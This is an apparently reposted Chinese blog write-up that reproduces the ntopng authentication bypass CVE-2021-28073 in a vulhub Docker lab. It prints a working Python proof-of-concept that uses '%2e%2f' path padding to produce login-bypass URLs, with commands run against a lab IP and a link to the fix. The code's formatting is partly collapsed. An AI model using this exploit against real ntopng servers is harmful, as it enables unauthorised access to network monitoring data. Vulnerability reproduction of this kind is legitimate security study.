ntopng权限绕过(CVE-2021-28073)漏洞复现

  • A+
所属分类:安全漏洞

简介

 

ntopng是一款基于Web的流量分析与集流工具。

 

 

环境搭建

 

https://github.com/vulhub/vulhub/tree/master/ntopng/CVE-2021-28073


 

执行如下命令启动ntopng

docker-compose up -d

ntopng权限绕过(CVE-2021-28073)漏洞复现


访问http://your-ip:3000将被跳转到登录页面,admin/admin进行登录

 

ntopng权限绕过(CVE-2021-28073)漏洞复现

ntopng权限绕过(CVE-2021-28073)漏洞复现


 

 

漏洞复现

 

Pocimport sysimport requestsimport argparseimport logging  def is_ntopng() -> bool:    response = session.get(base_url, allow_redirects=False)    return response.status_code == 302 and '/lua/login.lua' in response.headers.get('Location', '')  def get_base_length() -> int:    for i in range(90, 120):        url = base_url + '/lua/' + '%2e%2f' * i + 'as_stats.lua.css'        response = session.get(url, allow_redirects=False)        if response.status_code < 300:            return 255 - 1 - i * 2 - len('as_stats.lua')     for i in range(90, 120):        url = base_url + '/lua/' + '%2e%2f' * i + 'get_macs_data.lua.css'        response = session.get(url, allow_redirects=False)        if response.status_code < 300:            return 255 - 1 - i * 2 - len('get_macs_data.lua')     return -1  def get_padding_length(path: str):    padding_length = 255 - 1 - base_length - len(path)    if padding_length % 2 == 1:        raise RuntimeError(f'path {path} is not support')     return int(padding_length / 2)  logging.basicConfig(stream=sys.stderr, level=logging.WARNING)session = requests.Session()session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'  if __name__ == '__main__':    parser = argparse.ArgumentParser(description='CVE-2021-28073 POC for ntopng.')    parser.add_argument('-u', '--url', help='base url for ntopng, eg: http://192.168.1.233:3000', metavar='<URL>', required=True)    parser.add_argument('-v', '--verbose', default=False, action='store_true')        subparsers = parser.add_subparsers(dest='action')     baselength_command = subparsers.add_parser('baselength', help='get base path length of ntopng')     generate_command = subparsers.add_parser('generate', help='generate the authenticate bypass url')    generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)    generate_command.add_argument('-p', '--path', help='lua pathname', metavar='<PATH>', required=True)     generate_command = subparsers.add_parser('include', help='generate the arbitrary file inclusion url')    generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)    generate_command.add_argument('-i', '--include', help='path to include', metavar='<PATH>', required=True)     args = parser.parse_args()    if not args.action:        parser.print_help()        sys.exit(1)     if args.verbose:        logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)     base_url = args.url.rstrip('/')        # check target    if not is_ntopng():        raise RuntimeError('No Ntopng detected')     if args.action == 'baselength':        base_length = get_base_length()        sys.stdout.write(f'ntopng install path length: {base_length}n')    elif args.action == 'generate':        base_length = args.length        path = args.path        sys.stdout.write(base_url + '/lua/' + '%2e%2f' * get_padding_length(path) + path + '.cssn')


执行脚本计算出ntopng lua目录的长度

python3 poc.py --url http://192.168.204.131:3000/ baselength


 

ntopng权限绕过(CVE-2021-28073)漏洞复现


使用POC生成越权访问URL

python3 poc.py --url http://192.168.204.131:3000/ generate -l 36 -p find_prefs.lua


 

ntopng权限绕过(CVE-2021-28073)漏洞复现


正常访问时会302跳转到登录页面,无权限。

访问这个URL,发现可以越权返回正常信息

ntopng权限绕过(CVE-2021-28073)漏洞复现

 

 

修复建议

 

参考链接:https://github.com/ntop/ntopng/commit/e8b9721479f401f595c5c7bb151819aceb03ad71



本文始发于微信公众号(锋刃科技):ntopng权限绕过(CVE-2021-28073)漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: